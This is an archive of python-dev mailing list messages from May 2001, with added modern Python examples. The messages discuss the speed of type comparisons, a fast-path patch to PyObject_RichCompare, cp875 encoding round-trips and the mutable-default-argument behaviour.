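# The identity test has the same meaning as ==, just cheaper.
print(type(s) is str)         # False
# isinstance() treats the subclass as a string.
print(isinstance(s, str))     # True
```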

Jeremy


From jeremy at digicool.com  Tue May 15 19:41:58 2001
From: jeremy at digicool.com (Jeremy Hylton)
Date: Tue, 15 May 2001 13:41:58 -0400 (EDT)
Subject: [Python-Dev] FYI: MIT's dynamic language design panel now online
In-Reply-To: <20010515115120.A14357@glacier.fnational.com>
References: <000901c0dd6b$cdb5d960$e46940d5@hagrid>
	<20010515115120.A14357@glacier.fnational.com>
Message-ID: <15105.27238.582785.851371@slothrop.digicool.com>

I downloaded one of the files, but the QuickTime player I have on my
Windows box said it didn't understand the file format.  I eventually
got the 100kbps streaming version to "work", where "work" meant
mostly an audio feed and occasional stills that were recognizable.

Jeremy

PS It was cool to watch the one on compilation.  Mat Hostetter, one of
the panelists, is my old roommate!


From barry at digicool.com  Wed May 16 00:56:10 2001
From: barry at digicool.com (Barry A. Warsaw)
Date: Tue, 15 May 2001 18:56:10 -0400
Subject: [Python-Dev] Comparison speed
References: <LNBBLJKPBEHFEDALKOLCAEEMKCAA.tim.one@home.com>
	<200105152059.f4FKxuI03903@mira.informatik.hu-berlin.de>
	<200105152241.RAA00926@cj20424-a.reston1.va.home.com>
	<15105.26334.610144.846269@slothrop.digicool.com>
Message-ID: <15105.46090.203278.397835@anthem.wooz.org>

>>>>> "JH" == Jeremy Hylton <jeremy at digicool.com> writes:

    JH> I only learned recently that isinstance() can be called with
    JH> types instead of classes.  I suppose the name led me in the
    JH> wrong direction.  I had the silly idea that it only applied to
    JH> instances <0.1 wink>.

    JH> So it comes as little surprise to me that there is a lot of
    JH> code executed in, e.g., the test suite that does comparisons
    JH> on types.

    JH> In the Lib directory, there are 63 files that use == and the
    JH> builtin type function.  (Simple grep.)  A total of 139
    JH> instances of this idiom.  A cursory scan suggests that most of
    JH> the calls are things like type(obj) == type('').

Even without the forward-looking insight that types are classes
<wink>, I think type comparisons should have been done with `is' and
not ==.  So old school type comparisons should have been done as

    type(obj) is StringType

whereas new school type comparisons should be done as

    isinstance(obj, StringType)

With Python 2.1, == is naturally slower than `is', but isinstance()
comes in somewhere in the middle.

563897.802881 is comparisons per second
506827.201066 == comparisons per second
520696.916088 isinstance() comparisons per second

-Barry

-------------------- snip snip --------------------
from types import StringType
import time
r = range(1000000)

def one(r=r):
    x = 'hello'
    t0 = time.time()
    for i in r:
        type(x) is StringType
    t1 = time.time() - t0
    print len(r) / t1, 'is comparisons per second'

def two(r=r):
    x = 'hello'
    t0 = time.time()
    for i in r:
        type(x) == StringType
    t1 = time.time() - t0
    print len(r) / t1, '== comparisons per second'

def three(r=r):
    x = 'hello'
    t0 = time.time()
    for i in r:
        isinstance(x, StringType)
    t1 = time.time() - t0
    print len(r) / t1, 'isinstance() comparisons per second'


one()
two()
three()
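A rough Python 3 equivalent of the benchmark above uses the timeit module instead of hand-rolled loops. This sketch assumes `str` in place of `types.StringType`, which no longer exists in Python 3. No numbers are claimed here, since results depend on machine and interpreter version.

```python
import timeit

def rates(number=100_000):
    """Operations per second for the three type tests timed above."""
    setup = "x = 'hello'"
    stmts = {
        "is": "type(x) is str",
        "==": "type(x) == str",
        "isinstance()": "isinstance(x, str)",
    }
    result = {}
    for name, stmt in stmts.items():
        # timeit.timeit runs `stmt` `number` times and returns total seconds.
        seconds = timeit.timeit(stmt, setup=setup, number=number)
        result[name] = number / seconds
    return result

if __name__ == "__main__":
    for name, per_sec in rates().items():
        print(f"{per_sec:,.0f} {name} comparisons per second")
```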
										    

From tim.one at home.com  Wed May 16 01:49:03 2001
From: tim.one at home.com (Tim Peters)
Date: Tue, 15 May 2001 19:49:03 -0400
Subject: [Python-Dev] Comparison speed
In-Reply-To: <200105151945.f4FJjxM02351@mira.informatik.hu-berlin.de>
Message-ID: <LNBBLJKPBEHFEDALKOLCOEGKKCAA.tim.one@home.com>

Making the 5am email concrete, this is what I meant:

Index: object.c
===================================================================
RCS file: /cvsroot/python/python/dist/src/Objects/object.c,v
retrieving revision 2.131
diff -c -r2.131 object.c
*** object.c	2001/05/11 03:36:45	2.131
--- object.c	2001/05/15 23:39:24
***************
*** 835,841 ****
  		}
  	}
  	else {
! 		res = do_richcmp(v, w, op);
  	}
  	compare_nesting--;
  	return res;
--- 835,863 ----
  		}
  	}
  	else {
! 		cmpfunc f;
! 		if (v->ob_type == w->ob_type
! 		    && RICHCOMPARE(v->ob_type) == NULL
! 		    && (f = v->ob_type->tp_compare) != NULL)
! 		{
! 			int c = (*f)(v, w);
! 			if (c < 0 && PyErr_Occurred())
! 				res = NULL;
! 			else {
! 				switch (op) {
! 					case Py_LT: c = c <  0; break;
! 					case Py_LE: c = c <= 0; break;
! 					case Py_EQ: c = c == 0; break;
! 					case Py_NE: c = c != 0; break;
! 					case Py_GT: c = c >  0; break;
! 					case Py_GE: c = c >= 0; break;
! 				}
! 				res = c ? Py_True : Py_False;
! 				Py_INCREF(res);
! 			}
! 		}
! 		else
! 			res = do_richcmp(v, w, op);
  	}
  	compare_nesting--;
  	return res;

That's a local change to PyObject_RichCompare, taking a fast path for most
scalar types (which don't have richcmps but do have tp_compare today).  On my
Win98 box reproducible timings are impossible, but it obviously chops out
layers and layers of function calls and redundant tests when it triggers.
It triggers more often than not in every app I've tried: from 60%
of PyObject_RichCompare calls to nearly 100%.
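The heart of the fast path is the switch that turns one three-way result into any of the six rich answers. Here is a Python model of just that step. The names are hypothetical, and the same-type and "no tp_richcompare" checks from the patch are not modelled.

```python
# Turn a three-way result c (<0, 0, >0) into a rich-comparison answer,
# mirroring the switch statement in the patch above.
THREE_WAY_TO_RICH = {
    "LT": lambda c: c < 0,
    "LE": lambda c: c <= 0,
    "EQ": lambda c: c == 0,
    "NE": lambda c: c != 0,
    "GT": lambda c: c > 0,
    "GE": lambda c: c >= 0,
}

def three_way(a, b):
    """A classic cmp(): negative, zero or positive."""
    return (a > b) - (a < b)

def rich_via_three_way(v, w, op, compare=three_way):
    """Answer a rich comparison with a single call to a 3-way compare."""
    c = compare(v, w)
    return THREE_WAY_TO_RICH[op](c)
```

One call to the three-way function answers every operator, which is why types that only implement tp_compare lose nothing by taking this path.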


From tim.one at home.com  Wed May 16 02:01:05 2001
From: tim.one at home.com (Tim Peters)
Date: Tue, 15 May 2001 20:01:05 -0400
Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Objects tupleobject.c,2.48,2.49
In-Reply-To: <200105152136.QAA00489@cj20424-a.reston1.va.home.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCGEGMKCAA.tim.one@home.com>

[Tim]
> BUG ALERT:  The tuple (and list) richcmp algorithm is arguably wrong,
> because it won't believe there's any difference unless Py_EQ
> returns false for some corresponding elements:
>
> >>> class C:
> ...     def __lt__(x, y): return 1
> ...     __eq__ = __lt__
> ...
> >>> C() < C()
> 1
> >>> (C(),) < (C(),)
> 0
> >>>
>
> That doesn't make sense -- provided you believe the defn. of C
> makes sense.

[Guido]
> I think in this example the problem is with C, not with the tuple
> algorithm.

I can live with that.

> The question is, what are you going to do otherwise?  You
> could test for < first, == second -- but that means twice as many
> comparisons, and for reasonably-behaved items it makes no difference
> at all.

The question remaining is how much of this list/tuple richcmp behavior is
guaranteed by the language and how much is just implementation-dependent
fuzz.

For a more vanilla example, I removed the EQ/NE "lengths differ?" tuple
richcmp early-exit test because I never found code that made it trigger (but
tons of code that gets there without triggering).  But this has semantic
implications too:  an implementation without the early exit may call
user-defined comparison routines that raise exceptions when comparing tuples
of different lengths now.  Do you care?  (I don't.)
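The semantic difference can be made visible with an element whose == raises. In this sketch, `seq_eq` and `Touchy` are hypothetical. The `early_exit` flag toggles the "lengths differ?" test being discussed.

```python
def seq_eq(a, b, early_exit=True):
    """Sequence equality, optionally skipping the element loop when lengths differ."""
    if early_exit and len(a) != len(b):
        return False               # decided without touching any element
    for x, y in zip(a, b):
        if not (x == y):           # a user-defined __eq__ may run (and raise) here
            return False
    return len(a) == len(b)


class Touchy:
    """Hypothetical element whose __eq__ raises, so any comparison shows up."""
    def __eq__(self, other):
        raise RuntimeError("compared!")
```

With the early exit, `seq_eq((Touchy(),), (Touchy(), 1))` quietly returns False. Without it, the first pair gets compared and the exception escapes.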


From tim.one at home.com  Wed May 16 02:37:56 2001
From: tim.one at home.com (Tim Peters)
Date: Tue, 15 May 2001 20:37:56 -0400
Subject: [Python-Dev] Comparison speed
In-Reply-To: <200105152059.f4FKxuI03903@mira.informatik.hu-berlin.de>
Message-ID: <LNBBLJKPBEHFEDALKOLCOEGMKCAA.tim.one@home.com>

[Martin v. Loewis]
> ...
> I'd like to add another data point, answering the question what types
> are most frequently compared.

That varies wildly by app.  I have apps where int compares *overwhelmingly*
dominate, others where float compares do, many where string compares do, and
the last code I wrote for Zope spends most of its (very substantial) time
doing lookups of "object ids" in dicts.  In Python terms, those are Pythong
lon (unbounded) ints today, and potentially Python ints on 64-bit boxes, and
that's another case where ceval.c's special-casing of int compares is
impotent.

Heck, sort a large homogeneous array once, and whatever element type that
array has will likely dominate comparisons for the whole app!

That's why I'm so keen to chop out a half dozen layers of blubber for *all*
types that don't play the richcmp game (which today includes every type I
mentioned above).

> The first set of data is for running the Python testsuite.
>
> riches      3040952  # Calls to PyType_RichCompare
> eqs         2828345  # Calls where the types are equal
>
> String      2323122
> Float        141507
> Int          125187
> Type          99477
> Tuple         84503
> Long          30325
> Unicode       10782
> Instance       9335
> List           2997
> None            383
> Class           318
> Complex         219
> Dict             57
> Array            49
> WeakRef          34
> Function         11
> File             11
> SRE_Pattern      10
> CFunction         9
> Lock              8
> Module            1
>
> So strings cover 82% of all the compare calls of equally-typed
> objects, followed by floats with 5%. Those calls together cover 93% of
> the richcompare calls.
>
> Since this might give a blurred view of what is actually used in
> applications,

Note that the top 4 types don't have a tp_richcompare slot today.  The tuples
are likely composed of simple scalar types, and the latter benefit too.  But
as above, we can't say anything in advance about the *specific* types a given
app is going to compare most often.  There is no "typical app" in that
respect.

> I ran the PyXML testsuite with that python binary
> also. Leaving out types that are not used, I get
>
> riches        88465
> eqs           59279
>
> String        48097
> Int            5681
> Type           3170
> Tuple           760
> List            492
> Float           332
> Instance        269
> Unicode         243
> None            225
> SRE_Pattern       4
> Long              3
> Complex           3
>
> The first observation here is that "only" 67% of the calls are with
> equally-typed objects.

Someone who cares about the speed of PyXML would be well advised to figure
out why <0.9 wink>:  there's no scheme on the horizon that will speed
mixed-type comparisons one whit.

> Of those, 80% are with strings, 9% with integers.

XML is a string-crunching app, right?

> The last example is idle, where I just did an "import httplib", for
> fun.
>
> riches        50923
> eqs           49882
>
> String        31198
> Tuple          8312
> Type           7978
> Int            1456
> None            600
> SRE_Pattern     210
> List            122
> Instance          4
> Float             1
> Instance method   1
>
> Roughly the same picture: 97% calls with equally-typed objects, of
> those 62% strings, 3% integers. Notice the 15% for tuples and types,
> each.

Surprising!

> So to speed-up the common case clearly means to speed-up string
> comparisons.

The only thing the apps I've tried have in common is that the types compared
most often do have tp_compare but not tp_richcompare functions.  The test
suite, XML and IDLE are all heavy string-slingers.

> If I'd need to optimize anything else afterwards, I'd look into type
> objects - most likely, they are compared for EQ, which can be done
> nicely and directly in a tp_richcompare also.

Would do just as well to give them a one-liner tp_compare function (in
conjunction with the posted patch).

> Those two optimizations together would give a richcompare to 95% of
> the objects in the IDLE case.

Since that's the exact opposite of what I want to do, it's at least
interesting <wink>.  Whatever, there needs to be a (very) fast path, and it
needs to pick on something that all common types implement, including at
least strings, ints, longs, floats and-- I guess --type objects.

I don't know about other people, but I have lots of code that uses the cmp()
function heavily.  That path has also gotten bloated, and tries each of
Py_EQ, Py_LT and Py_GT in turn now, hoping for *one* of them to say "yes".
It does this now even if the tp_compare slot is defined.  The only thing
that's saving cmp()-slinging code from major sloth now is that the basic
types do *not* implement tp_richcompare, so try_rich_to_3way_compare gets out
early (before doing the three-way Py_EQ etc dance).  But give the basic
scalar types richcmp functions, and cmp() will slow down a lot (unless more
hacks are added to stop that).
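The cost Tim describes can be modelled by deriving a cmp()-style result from rich comparisons tried in the order Py_EQ, Py_LT, Py_GT. This is a simplified Python model, not try_rich_to_3way_compare itself. The counter shows that one to three rich calls are needed, depending on the data.

```python
def three_way_via_rich(a, b, rich):
    """Derive cmp()-style -1/0/1 by trying EQ, then LT, then GT."""
    for op, outcome in (("EQ", 0), ("LT", -1), ("GT", 1)):
        if rich(a, b, op):
            return outcome
    # No ordering found; a real implementation needs some fallback here.
    raise TypeError("no consistent ordering")


def counting_rich(calls):
    """Wrap Python's own comparisons and record every rich call made."""
    ops = {"EQ": lambda x, y: x == y,
           "LT": lambda x, y: x < y,
           "GT": lambda x, y: x > y}
    def rich(a, b, op):
        calls.append(op)
        return ops[op](a, b)
    return rich
```

Equal strings cost one call, a "less" answer costs two, and a "greater" answer costs all three.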


From greg at cosc.canterbury.ac.nz  Wed May 16 03:58:05 2001
From: greg at cosc.canterbury.ac.nz (Greg Ewing)
Date: Wed, 16 May 2001 13:58:05 +1200 (NZST)
Subject: [Python-Dev] Comparison speed
In-Reply-To: <LNBBLJKPBEHFEDALKOLCOEGMKCAA.tim.one@home.com>
Message-ID: <200105160158.NAA18339@s454.cosc.canterbury.ac.nz>

Tim Peters <tim.one at home.com>:

> In Python terms, those are Pythong lon (unbounded) ints today
                             ^^^^^^^
What Pythonistas wear on their feet?

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg at cosc.canterbury.ac.nz	   +--------------------------------------+


From esr at thyrsus.com  Wed May 16 04:27:38 2001
From: esr at thyrsus.com (Eric S. Raymond)
Date: Tue, 15 May 2001 22:27:38 -0400
Subject: [Python-Dev] Comparison speed
In-Reply-To: <200105160158.NAA18339@s454.cosc.canterbury.ac.nz>; from greg@cosc.canterbury.ac.nz on Wed, May 16, 2001 at 01:58:05PM +1200
References: <LNBBLJKPBEHFEDALKOLCOEGMKCAA.tim.one@home.com> <200105160158.NAA18339@s454.cosc.canterbury.ac.nz>
Message-ID: <20010515222738.A9996@thyrsus.com>

Greg Ewing <greg at cosc.canterbury.ac.nz>:
> Tim Peters <tim.one at home.com>:
> 
> > In Python terms, those are Pythong lon (unbounded) ints today
>                              ^^^^^^^
> What Pythonistas wear on their feet?

No, man.  It's what sexy lady Pythonistas wear on the beach in Rio.

(Yes, I know some sexy lady Pythonistas.  No, you can't have their
phone numbers.  Pthfthfthpht...)
-- 
		Eric S. Raymond <http://www.tuxedo.org/~esr/>

Question with boldness even the existence of a God; because, if there
be one, he must more approve the homage of reason, than that of
blindfolded fear.... Do not be frightened from this inquiry from any
fear of its consequences. If it ends in the belief that there is no
God, you will find incitements to virtue in the comfort and
pleasantness you feel in its exercise...
	-- Thomas Jefferson, in a 1787 letter to his nephew


From tim.one at home.com  Wed May 16 09:14:25 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 16 May 2001 03:14:25 -0400
Subject: [Python-Dev] RE: Ill-defined encoding for CP875?
In-Reply-To: <3B00E98E.1C44FF5@lemburg.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCGEHLKCAA.tim.one@home.com>

[MAL]
> Round-tripping is obviously very important if you use Unicode
> as basis for working on text.

Since I use 7-bit ASCII exclusively, I've been using

    encode = decode = lambda x: x

I haven't proved that's round-trippable, but haven't bumped into an exception
yet.

> I don't know about the reasoning behind making cp875 fail the
> round-trip -- Unicode certainly provides means to make mappings
> round-trip safe (e.g. by reverting to the private Unicode
> char. point areas).

Then I ignorantly but confidently (indeed, with the cheery confidence only
the truly ignorant can truly enjoy!) vote for your approach that maps the
non-round-trippable cp875 code points to None.  Better safe than sorry, by
default.  Else 6 of the 7 ambiguous chars will be silent surprises by
default.
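Detecting and marking the non-round-trippable code points is a small inversion exercise. This sketch works on a made-up three-entry map, not on cp875's real table. It assumes the encoder keeps the lowest byte for each character, and it uses None to mean "undefined", as in the approach being voted for.

```python
def non_round_trippable(decoding_map):
    """Return the byte values that do not survive decode -> encode.

    The encoding map is built by inverting the decoding map, keeping the
    lowest byte for each character, so later duplicates cannot round-trip.
    """
    encoding_map = {}
    for byte in sorted(decoding_map):
        char = decoding_map[byte]
        if char is not None:
            encoding_map.setdefault(char, byte)
    return [byte for byte in sorted(decoding_map)
            if decoding_map[byte] is not None
            and encoding_map[decoding_map[byte]] != byte]


def mark_undefined(decoding_map):
    """Map every non-round-trippable byte to None (i.e. 'undefined')."""
    bad = set(non_round_trippable(decoding_map))
    return {b: (None if b in bad else c) for b, c in decoding_map.items()}


# A tiny hypothetical code page: 0x43 decodes to the same char as 0x41.
toy = {0x41: "A", 0x42: "B", 0x43: "A"}
```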


From tim.one at home.com  Wed May 16 09:25:28 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 16 May 2001 03:25:28 -0400
Subject: [Python-Dev] Comparison speed
In-Reply-To: <200105151527.KAA28734@cj20424-a.reston1.va.home.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCMEHLKCAA.tim.one@home.com>

[Guido]
> PEP 207 is quite explicit that == and != are not to be assumed each
> other's complement.  It is silent on the x==x issue but the PEP
> mentions IEEE 754 so I agree that this also shouldn't be cut short.

It's explicit about x==x too:

    (Note: Python currently assumes that x==x is always true
    and x!=x is never true; this should not be assumed.)

That's from the end of point #4, under "Proposed Resolutions".  I agreed
then, and still do <wink>.
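IEEE 754 NaNs are the standard case where x==x is false. Here is a Python 3 illustration. Note that Python 3's built-in containers check identity before ==, so the same NaN object is still found in a list, and a list containing it still equals itself.

```python
import math

x = float("nan")

# IEEE 754: a NaN is not equal to anything, including itself.
print(x == x)         # False
print(x != x)         # True

# Containers compare identical objects as equal without calling ==.
print(x in [x])       # True
print([x] == [x])     # True
print(math.isnan(x))  # True
```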


From martin at loewis.home.cs.tu-berlin.de  Wed May 16 09:28:45 2001
From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Wed, 16 May 2001 09:28:45 +0200
Subject: [Python-Dev] Comparison speed
In-Reply-To: <15105.26334.610144.846269@slothrop.digicool.com> (message from
	Jeremy Hylton on Tue, 15 May 2001 13:26:54 -0400 (EDT))
References: <LNBBLJKPBEHFEDALKOLCAEEMKCAA.tim.one@home.com>
	<200105152059.f4FKxuI03903@mira.informatik.hu-berlin.de>
	<200105152241.RAA00926@cj20424-a.reston1.va.home.com> <15105.26334.610144.846269@slothrop.digicool.com>
Message-ID: <200105160728.f4G7SjK01766@mira.informatik.hu-berlin.de>

> Sounds like we ought to do a search-and-destroy on type comparisons,
> replacing with isinstance() where possible.

At least in my applications, this is unfortunately not possible: I
want a test for byte-string-or-unicode-string. This could be done with
two isinstance calls, but that is certainly less efficient.

Marc-Andre once proposed a type representing the immediate supertype
of both byte strings and unicode strings; let's call it abstract string.
Then I could write isinstance(e, types.AbstractString).
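Later Python versions accept a tuple of types as the second argument to isinstance(), which folds the two calls into one without needing an abstract supertype. In this Python 3 sketch, `str` and `bytes` stand in for the unicode and byte string types, and `is_text` is a hypothetical name.

```python
def is_text(obj):
    """True for either kind of string, via one isinstance() call with a tuple."""
    return isinstance(obj, (str, bytes))
```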

Regards,
Martin


From martin at loewis.home.cs.tu-berlin.de  Wed May 16 09:24:56 2001
From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Wed, 16 May 2001 09:24:56 +0200
Subject: [Python-Dev] Comparison speed
In-Reply-To: <15105.42180.401918.223487@anthem.wooz.org> (barry@digicool.com)
References: <LNBBLJKPBEHFEDALKOLCAEEMKCAA.tim.one@home.com>
	<200105152059.f4FKxuI03903@mira.informatik.hu-berlin.de>
	<200105152241.RAA00926@cj20424-a.reston1.va.home.com> <15105.42180.401918.223487@anthem.wooz.org>
Message-ID: <200105160724.f4G7OuF01764@mira.informatik.hu-berlin.de>

>     GvR> I'm curious where the frequent comparisons of types come
>     GvR> from.
> 
> Not to mention the several hundred comparisons to None.

This is harder to analyse; I set a gdb breakpoint on the place where
RichCompare gets PyType_Type, then looked at what the caller does, then
ignored the breakpoint a few times and looked again. This is what I've
found; I may have missed important cases.

In PyXML, the expression

   type(e) in [types.StringType, types.UnicodeType]

is frequently computed. This goes through sequence_contains, which in turn
does up to two Py_EQ tests. In addition, compile.c:com_add has

   t = Py_BuildValue("(OO)", v, v->ob_type)
   PyDict_GetItem(dict, t)

Again, the dictionary lookup performs Py_EQ on the tuples, which does
Py_EQ on the elements.

This also accounts for the RichCompare calls which receive None: v may
be None, here, so t is (None, type(None)).

In IDLE, the situation is similar. com_add produces many compares with
types. In addition, sre.compile has

   type(s) in sre_compile.STRING_TYPES

which is the same test as the PyXML one. Finally, there is a
type-in-typetuple test inside Tkinter._cnfmerge.
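The cost of the `type(e) in [A, B]` idiom can be counted directly. A list membership test calls == on each element until one matches, so each evaluation costs one or two equality tests. Type objects' == cannot be instrumented, so this sketch uses a hypothetical `Probe` class as a stand-in.

```python
class Probe:
    """Hypothetical stand-in for a type object that counts == calls."""
    eq_calls = 0

    def __init__(self, name):
        self.name = name

    def __eq__(self, other):
        Probe.eq_calls += 1
        return isinstance(other, Probe) and self.name == other.name


STRING_TYPES = [Probe("bytes"), Probe("unicode")]
```

A match on the first entry costs one == call. A match on the second entry, or no match at all, costs two.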

Regards,
Martin


From i_sofer at yahoo.com  Wed May 16 09:53:25 2001
From: i_sofer at yahoo.com (Idan Sofer)
Date: 16 May 2001 10:53:25 +0300
Subject: [Python-Dev] Bug report: empty dictionary as default class argument
Message-ID: <200105160756.KAA29616@alpha.netvision.net.il>

Hello.

I have found a rather annoying bug in Python, present in both Python 1.5
and Python 2.0.

If a class has an argument with a default of an empty dictionary, then
all instances of the same class will point to the same dictionary,
unless the dictionary is explicitly defined by the constructor.

I attach a piece of code that demonstrates the problem
-------------- next part --------------
A non-text attachment was scrubbed...
Name: test.py
Type: text/x-python
Size: 1197 bytes
Desc: not available
URL: <http://mail.python.org/pipermail/python-dev/attachments/20010516/15c1b25b/attachment-0001.py>

From martin at loewis.home.cs.tu-berlin.de  Wed May 16 10:02:01 2001
From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Wed, 16 May 2001 10:02:01 +0200
Subject: [Python-Dev] Comparison speed
In-Reply-To: <LNBBLJKPBEHFEDALKOLCOEGMKCAA.tim.one@home.com>
References: <LNBBLJKPBEHFEDALKOLCOEGMKCAA.tim.one@home.com>
Message-ID: <200105160802.f4G821s02180@mira.informatik.hu-berlin.de>

> Since that's the exact opposite of what I want to do, it's at least
> interesting <wink>.

I'll put a patch on SF soon which does what you want to do, i.e. tries
tp_compare as the first thing if tp_richcompare is not there. Even
with this patch, your code is faster if strings have a
richcompare. Without richcompare, I get

0.720
0.720
0.720
0.730
0.720
0.720
0.730
0.720
0.720
0.730

With it, I get

0.710
0.720
0.720
0.710
0.710
0.720
0.710
0.710
0.710
0.720

Given that stock CVS Python is in the 0.78 range, the difference is
negligible, though.
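Averaging the two runs makes the size of the difference concrete. The unit of the timings is not stated above (presumably seconds), and the 0.78 baseline is the approximate figure quoted for stock CVS.

```python
from statistics import mean

without_rich = [0.720, 0.720, 0.720, 0.730, 0.720, 0.720, 0.730, 0.720, 0.720, 0.730]
with_rich = [0.710, 0.720, 0.720, 0.710, 0.710, 0.720, 0.710, 0.710, 0.710, 0.720]
stock_cvs = 0.78   # "in the 0.78 range", per the message above

a, b = mean(without_rich), mean(with_rich)
print(round(a, 3), round(b, 3))                   # 0.723 0.714
print(f"{(a - b) / a:.1%} between the patches")   # 1.2% between the patches
print(f"{(stock_cvs - a) / stock_cvs:.1%} vs stock CVS")
```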

Regards,
Martin


From larsga at garshol.priv.no  Wed May 16 10:19:10 2001
From: larsga at garshol.priv.no (Lars Marius Garshol)
Date: 16 May 2001 10:19:10 +0200
Subject: [Python-Dev] Bug report: empty dictionary as default class argument
In-Reply-To: <200105160756.KAA29616@alpha.netvision.net.il>
References: <200105160756.KAA29616@alpha.netvision.net.il>
Message-ID: <m3sni51zb5.fsf@lambda.garshol.priv.no>

* Idan Sofer
| 
| If a class has an argument with a default of an empty dictionary,
| then all instances of the same class will point to the same
| dictionary, unless the dictionary is explictly defined by the
| constructor.

This is part of the language semantics, and so not a bug. The default
values of optional arguments are evaluated once, when the def statement
for the function/method is executed. You may consider the semantics
ill-advised, but it is intentional.
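A short Python 3 demonstration of the behaviour follows. The original attachment was scrubbed, so this class is reconstructed from the quoted snippet. The `{}` is created once, when `def` runs, and every instance built without an argument shares it.

```python
class Foo:
    def __init__(self, attribs={}):    # the {} is evaluated once, at def time
        self.attribs = attribs

a = Foo()
b = Foo()
a.attribs["colour"] = "red"

print(b.attribs)                                  # {'colour': 'red'}
print(a.attribs is b.attribs)                     # True
print(Foo.__init__.__defaults__[0] is a.attribs)  # True
```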
 
| class foo:
|     
|     def __init__(self,attribs={}):
| 	self.attribs=attribs;
| 	return None;

I usually write this as:

class Foo:

  def __init__(self, attribs = None):
    self.attribs = attribs or {}
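One subtlety of the `or` idiom: an empty dict that the caller passes in on purpose is falsy, so it gets silently replaced by a fresh one. That matters if the caller expects to see later mutations. A variant that tests for None explicitly avoids this (a sketch, not the only way to write it):

```python
class Foo:
    def __init__(self, attribs=None):
        # Test for None explicitly: `attribs or {}` would also swap out an
        # empty dict the caller passed in on purpose.
        self.attribs = {} if attribs is None else attribs

shared = {}
f = Foo(shared)
f.attribs["x"] = 1
print(shared)                           # {'x': 1}
print(Foo().attribs is Foo().attribs)   # False
```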

--Lars M.


From fredrik at pythonware.com  Wed May 16 10:18:44 2001
From: fredrik at pythonware.com (Fredrik Lundh)
Date: Wed, 16 May 2001 10:18:44 +0200
Subject: [Python-Dev] Bug report: empty dictionary as default class argument
References: <200105160756.KAA29616@alpha.netvision.net.il>
Message-ID: <011401c0dde0$d4adb2e0$0900a8c0@spiff>

Idan Sofer wrote:
>
> I have found a rather annoying bug in Python, present in both Python 1.5
> and Python 2.0.
>
> If a class has an argument with a default of an empty dictionary, then
> all instances of the same class will point to the same dictionary,
> unless the dictionary is explictly defined by the constructor.

maybe you should check the documentation (or the FAQ) before
submitting bugs?

    http://www.python.org/doc/current/ref/function.html

    Default parameter values are evaluated when the function
    definition is executed. This means that the expression is evaluated
    once, when the function is defined, and that that same ``pre-
    computed'' value is used for each call. This is especially important
    to understand when a default parameter is a mutable object,
    such as a list or a dictionary: if the function modifies the object
    (e.g. by appending an item to a list), the default value is in
    effect modified.

Cheers /F

PS. when you do report real bugs, please use the bug tracker:

    http://sourceforge.net/tracker/?group_id=5470&atid=105470

"is this a bug" questions should be sent to comp.lang.python


From tim.one at home.com  Wed May 16 10:41:47 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 16 May 2001 04:41:47 -0400
Subject: [Python-Dev] Comparison speed
In-Reply-To: <200105151945.f4FJjxM02351@mira.informatik.hu-berlin.de>
Message-ID: <LNBBLJKPBEHFEDALKOLCEEHOKCAA.tim.one@home.com>

[Martin]
> Producing numbers is easy :-)

If only making sense of them were too <0.6 wink>.

> I've instrumented my version where string implements richcmp, and
> special-cases everything I can think of.

1. String objects are also equal despite being different objects,
   if their ob_sinterned pointers are equal and non-NULL.  So if
   you're looking for every trick in & out of the book, that's
   another one.
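At the Python level, Python 3 exposes interning through `sys.intern` (in 2.1 it lived in the C field ob_sinterned). Two equal strings that have both been interned are the same object, which is why an identity check suffices for them.

```python
import sys

a = "".join(["py", "thon"])   # built at runtime
b = "python"

print(a == b)                           # True: equal contents
print(sys.intern(a) is sys.intern(b))   # True: one shared object
```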

2. But the real goal is to add only those special cases that in
   combination yield the largest net win, and that's much harder
   to determine (since there are no typical apps, and it's very
   hard to quantify the tradeoffs here in a credible x-platform
   x-app way).

> Counting is done for running the test suite. With this, I get
>
> Calls to string_richcompare:   2378660
> Calls with different types:      33992 (ie. one is not a string)
> Calls with identical strings:   120517
> Calls where lens decide !EQ:   1775716
> ----------------------------
> Calls richcmp -> oldcomp:       448435
> Total calls to oldcomp:        1225643
> Calls oldcomp -> memcmp:        860174
>
> So 5% of the calls are with identical strings, for which I can
> immediately decide the outcome.

But also at the cost of doing a fruitless compare and branch in 95% of calls.
There isn't enough data to guess whether this is a net win or a net loss
(compared to leaving this special case out).

Note that if the "identical string pointers" special case is a net win, it
would be effective inside oldcomp instead (i.e., you don't need a richcompare
slot to exploit it); indeed, it may be more effective there, since there are
some 800,000 calls to oldcmp that *didn't* come from richcmp, and oldcmp
doesn't check for pointer equality now (but PyObject_Compare does, so there
didn't *used* to be any point to it in oldcmp).

Any idea where those 800,000 virgin calls to oldcomp are coming from?  That's
a lot.

> 75% can be decided in terms of the string lengths, which leaves ca. 19%
> for cases where lexicographical comparison is needed.

So about 1 in 5 times there's also the additional (wrt just calling oldcmp
all the time) overhead of a second function call (i.e., the call to oldcmp
made by richcmp).

> In those cases, the first byte decides in 30%. If I remove the test
> for "len decides !EQ", I get
>
> #riches:                       2358322
> #riches_ni:                      34108
> #idents_decide:                 102050
> #lens_decide:                        0
> --------------------------------------
> rest(computed):                2222164
> #comps:                        2949421
> #memcmps:                       917776
>
> So still, ca. 30% can be decided by first byte.

Sorry, I couldn't follow this part, except noting that 917776 is about 30% of
2949421, in which case I would have expected you to say that 70% can be
decided by first byte.

> It still appears that the total number of calls to memcmp is higher
> when the length is not taken into consideration.

Since 917776 is larger than the earlier 860174, isn't that plain?  BTW, some
compilers inline memcmp, so assuming it's "a call" is a x-platform trap; of
course assuming it *isn't* is also a x-platform trap.

> To verify this claim, I've counted the cases where the length
> decides the outcome, but looking at the first byte also had:
>
> lens_decide:                    1784897
> lens_decide_firstbyte_wouldhave:1671148
>
> So in 6% of the cases, checking the length alone gives a decision
> which looking at the first byte doesn't; plus it saves a function
> call.

